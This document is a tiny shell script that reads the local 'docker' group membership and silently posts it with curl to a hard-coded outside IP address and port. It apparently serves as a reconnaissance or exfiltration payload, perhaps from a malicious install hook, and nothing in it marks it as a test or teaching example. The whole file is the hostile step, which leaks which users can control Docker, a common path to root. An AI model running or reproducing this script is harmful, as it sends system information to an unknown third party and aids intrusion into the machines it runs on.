#!/bin/sh
getent group docker 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/dgrp
